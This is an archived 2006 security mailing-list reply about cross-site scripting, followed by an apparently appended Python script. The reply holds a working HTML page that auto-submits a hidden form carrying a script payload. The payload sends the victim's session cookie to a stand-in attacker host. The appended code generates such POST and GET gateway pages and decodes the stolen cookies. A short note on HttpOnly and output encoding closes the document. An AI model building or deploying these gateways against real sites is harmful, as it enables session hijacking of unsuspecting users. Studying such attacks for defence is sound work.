Vulnerability Development mailing list archives

Re: Sourceforge.net XSS


From: ascii <ascii () katamail com>
Date: Fri, 14 Apr 2006 05:15:13 +0200

v9 () fakehalo us wrote:
> I understand the possibilities of XSS, however if you
> have to inject it as part of the URL
[cut]

XSS are serious bugs, like header injection and session fixation.

XSS are less critical than full SQL injection + INTO OUTFILE into your
cgi-bin directory (for example) or other vectors.

Anyway, an XSS can be exploited in many ways, and also in conjunction
with other technologies like phishing.

Another way could be a doorway page, e.g. for HTTP POST XSS.

Here is an example:

--example.html--

<html>
<head>
 <title>title</title>
 <style type="text/css" media="screen,print">
 body { margin:0; padding:0; }
 body, html { font-family:"Trebuchet MS", Georgia, Verdana, serif;
color:white; }
 a { color:white; text-decoration:none; }
 </style>
</head>
<body onload="document.login_form.submit()"><!-- force gateway, onload -->
 <table width="100%" height="100%" bgcolor="#9BBB38"><tr><td
valign="middle" align="center">

  <!-- simple and effective, xss post gateway coded by ascii, vuln by
saidone -->
  <!-- the hidden form carries the payload in the vulnerable POST field;
the value attribute is double-quoted and the payload only uses single
quotes, so it is submitted unchanged and runs once the victim reflects it -->
  <form method="post" action="http://www.VICTIM.TLD/admin/index.php"
name="login_form">
   <input type="hidden" id="user" name="FIELD_username"
value="<script>alert('XSS vuln, your cookie is '+document.cookie+
'. Now your PHP session is haxored and the cookie value is sent back '+
'to the malicious haxor! (Press OK to send the cookie value and '+
'continue your hijacked navigation..)');
document.write('<img src=\'http://ATTACKER.TLD/cookie.php?cookie='
+document.cookie+'\'>');</script>"
/>
   <input type="hidden" id="pass" name="FIELD_password" value="" />
   <!--<button type="submit" name="submit">Vai</button>-->
  </form>
  <div style="background-color: green; height: 95%; width: 95%;"
onclick="document.login_form.submit()"
onmouseover="document.login_form.submit()"><!-- force gateway, onclick
and onmouseover -->
   <h1><a href="#" onclick="document.login_form.submit()">click
everywhere</a></h1><!-- force gateway, onclick -->
  </div>
  <!-- the end : ) -->

</td></tr></table><img src="http://devel.ush.it/track/me.php" /><a
href="http://www.ush.it">www.ush.it</a>
</body>
</html>

--/example.html--

cookie.php will store the user session cookie; if you need a generic
logger you could dump any GPC variables, as done by this simple script:

http://www.ush.it/team/ascii/hack-xsstrap/track.phps

For HTTP GET XSS you could use a meta refresh or document.location
directly (simpler to implement, less code).

regards, ascii, http://www.ush.it/
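The POST doorway page above, the GET variant (meta refresh / document.location) and the receiving end (what cookie.php logs) as one added example in Python. This is not code from ascii's post or from ush.it; it generates the same kind of pages programmatically and shows the two encodings that matter: HTML attribute escaping for the hidden POST field and URL encoding for the GET query string. The hosts VICTIM.TLD and ATTACKER.TLD, the field names FIELD_username / FIELD_password and the payload are constructed placeholders, as in the post.

```python
"""Added example, not from the original post: generates an XSS POST
"doorway" page and a GET gateway, and decodes what the logger receives.
All hosts, field names and the payload are constructed placeholders."""
import html
import json
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode, urlsplit

LOGGER_URL = "http://ATTACKER.TLD/cookie.php"  # assumed exfiltration endpoint

# Same idea as the post's payload: inject an <img> whose src carries document.cookie.
PAYLOAD = ("<script>document.write('<img src=\"" + LOGGER_URL +
           "?cookie='+encodeURIComponent(document.cookie)+'\">')</script>")


def post_gateway_html(action, fields, form_name="login_form"):
    """Self-submitting POST page (the doorway for a POST-only XSS).
    Names and values are attribute-escaped, so a payload containing double
    quotes cannot break out of its own value="..."; the browser decodes the
    entities again and POSTs the original payload bytes to the victim."""
    inputs = "\n".join(
        '    <input type="hidden" name="%s" value="%s" />'
        % (html.escape(name, quote=True), html.escape(value, quote=True))
        for name, value in fields.items())
    return ("<html><body onload=\"document.%s.submit()\">\n"
            "  <form method=\"post\" action=\"%s\" name=\"%s\">\n%s\n  </form>\n"
            "</body></html>\n"
            % (form_name, html.escape(action, quote=True), form_name, inputs))


def get_gateway_url(base_url, param, payload):
    """GET variant: the payload travels URL-encoded in the query string."""
    return base_url + "?" + urlencode({param: payload})


def get_gateway_html(url):
    """Meta refresh plus a document.location fallback for a GET-reflected XSS.
    json.dumps yields a valid JS string literal; '/' is escaped as well so the
    literal can never contain a premature '</script>'."""
    js_literal = json.dumps(url).replace("/", "\\/")
    return ('<html><head><meta http-equiv="refresh" content="0;url=%s" />'
            '<script>document.location=%s;</script></head><body></body></html>\n'
            % (html.escape(url, quote=True), js_literal))


class _HiddenFields(HTMLParser):
    """Collects the hidden fields as a browser would submit them (entities decoded)."""
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.fields[a.get("name")] = a.get("value")


def submitted_fields(page):
    """Round-trip check: parse the generated page back into name -> value."""
    p = _HiddenFields()
    p.feed(page)
    return p.fields


def parse_exfil(request_target):
    """Receiving end (what cookie.php / track.phps would log): decode the
    query string of the GET that the injected <img> makes."""
    qs = urlsplit(request_target).query
    return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}


if __name__ == "__main__":
    page = post_gateway_html("http://www.VICTIM.TLD/admin/index.php",
                             {"FIELD_username": PAYLOAD, "FIELD_password": ""})
    print(page)
    print(get_gateway_html(get_gateway_url("http://www.VICTIM.TLD/search.php", "q", PAYLOAD)))
    print(parse_exfil("/cookie.php?cookie=PHPSESSID%3Dabc123"))
```

Two things a practitioner should check when assessing a report like this: whether the session cookie is HttpOnly (then document.cookie does not expose it and the exfiltration step above yields nothing, although the script still runs in the victim's origin), and, the actual fix, whether the application HTML-encodes FIELD_username before echoing it, which is the same attribute escaping the generator applies on its own side.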

